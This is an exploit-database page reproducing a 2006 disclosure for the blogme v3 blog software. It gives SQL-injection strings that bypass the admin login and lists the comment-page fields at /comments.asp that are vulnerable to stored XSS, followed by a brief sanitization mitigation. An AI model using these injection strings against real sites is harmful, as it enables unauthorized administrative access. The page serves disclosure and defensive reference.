header-logo
Suggest Exploit
vendor:
blogme v3
by:
Laurent Gaffié & Benjamin Mossé
7,5
CVSS
HIGH
Login Bypass & XSS (Post)
N/A
CWE
Product Name: blogme v3
Affected Version From: blogme v3
Affected Version To: blogme v3
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

blogme v3 [admin login bypass & xss (post)]

User can bypass the login authentication by using ' or '1' = '1 as username and 1'='1' ro ' as password. XSS vulnerability can be exploited by entering malicious code in the vulnerable fields Name, URL and Comments in /comments.asp?blog=85.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

blogme v3 [admin login bypass & xss (post)]
vendor site:http://www.drumster.net/
product:blogme v3
bug:login bypass & xss (post)
risk:high


admin login bypass :
user : ' or '1' = '1
passwd:  1'='1' ro '

xss post :
in: /comments.asp?blog=85  
vulnerables fields:
- Name 
- URL
- Comments


laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@gmail.com

# milw0rm.com [2006-11-14]

Navigation

Suggest Exploit

Services By CQR